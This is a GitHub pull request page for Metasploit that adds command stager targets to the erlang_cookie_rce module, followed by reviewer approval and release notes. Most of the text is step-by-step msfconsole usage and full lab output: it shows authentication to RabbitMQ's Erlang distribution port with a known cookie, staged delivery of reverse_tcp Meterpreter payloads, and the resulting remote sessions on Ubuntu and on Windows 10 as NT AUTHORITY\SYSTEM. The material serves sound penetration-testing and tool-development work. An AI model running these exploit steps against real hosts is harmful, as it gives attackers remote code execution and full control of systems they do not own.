New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add CmdStager to erlang_cookie_rce #11156

Merged
merged 1 commit into from Dec 21, 2018

Conversation

Projects
None yet
4 participants
@jrobles-r7
Copy link
Contributor

jrobles-r7 commented Dec 21, 2018

Add command stager targets to erlang_cookie_rce for additional payload options.

Verification

List the steps needed to make sure this thing works

  • ./msfconsole -q
  • set target 1 (Linux CmdStager)
  • set cookie <cookie>
  • set rhosts <rhost>
  • set payload linux/x86/meterpreter/reverse_tcp
  • set lhost <lhost>
  • run

Scenarios

Tested on Ubuntu 16.04.5 LTS running rabbitmq-server

$ ./msfconsole -q 
msf5 > use multi/misc/erlang_cookie_rce
msf5 exploit(multi/misc/erlang_cookie_rce) > set target 1
target => 1
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie EYHXTKCXVOFTKHLXMQTG
cookie => EYHXTKCXVOFTKHLXMQTG
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.130
rhosts => 172.22.222.130
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.130:25672 - Receiving server challenge
[*] 172.22.222.130:25672 - Sending challenge reply
[+] 172.22.222.130:25672 - Authentication successful, sending payload
[*] 172.22.222.130:25672 - Exploiting...
[*] 172.22.222.130:25672 - Command Stager progress -  11.34% done (99/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  22.57% done (197/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  33.91% done (296/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  45.02% done (393/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  56.36% done (492/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  67.70% done (591/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  79.04% done (690/873 bytes)
[*] 172.22.222.130:25672 - Command Stager progress -  90.49% done (790/873 bytes)
[*] Sending stage (910632 bytes) to 172.22.222.130
[*] 172.22.222.130:25672 - Command Stager progress - 100.00% done (873/873 bytes)
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60444) at 2018-12-21 07:17:22 -0600

meterpreter > sysinfo
Computer     : 172.22.222.130
OS           : Ubuntu 16.04 (Linux 4.15.0-29-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.130 - Meterpreter session 1 closed.  Reason: User exit

Tested on Windows 10 Pro running RabbitMQ Server

msf5 exploit(multi/misc/erlang_cookie_rce) > set target 3
target => 3
msf5 exploit(multi/misc/erlang_cookie_rce) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/erlang_cookie_rce) > set lhost 172.22.222.136 
lhost => 172.22.222.136
msf5 exploit(multi/misc/erlang_cookie_rce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(multi/misc/erlang_cookie_rce) > set cookie ZCCVYWSBUFNCNIYRZZCI
cookie => ZCCVYWSBUFNCNIYRZZCI
msf5 exploit(multi/misc/erlang_cookie_rce) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] 172.22.222.200:25672 - Receiving server challenge
[*] 172.22.222.200:25672 - Sending challenge reply
[+] 172.22.222.200:25672 - Authentication successful, sending payload
[*] 172.22.222.200:25672 - Exploiting...
[*] 172.22.222.200:25672 - Command Stager progress -   0.08% done (99/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.15% done (198/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -   0.23% done (297/128281 bytes)
<snip. wait 5 minutes or so...>
[*] 172.22.222.200:25672 - Command Stager progress -  99.79% done (128007/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.86% done (128106/128281 bytes)
[*] 172.22.222.200:25672 - Command Stager progress -  99.93% done (128189/128281 bytes)
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] 172.22.222.200:25672 - Command Stager progress - 100.00% done (128281/128281 bytes)
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:50835) at 2018-12-21 07:29:56 -0600

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(multi/misc/erlang_cookie_rce) > 

@busterb busterb self-assigned this Dec 21, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Dec 21, 2018

Verified on Linux, I'll trust you for Windows.

@busterb busterb merged commit 4bc871c into rapid7:master Dec 21, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Dec 21, 2018

@jrobles-r7 jrobles-r7 deleted the jrobles-r7:feature/cmdstager-erlang-cookie branch Dec 21, 2018

msjenkins-r7 added a commit that referenced this pull request Dec 21, 2018

@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Dec 21, 2018

Release Notes

This adds command stager support to the erlang_cookie_rce module, allowing for more flexibility in loading and executing payloads when targeting Linux and Windows.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment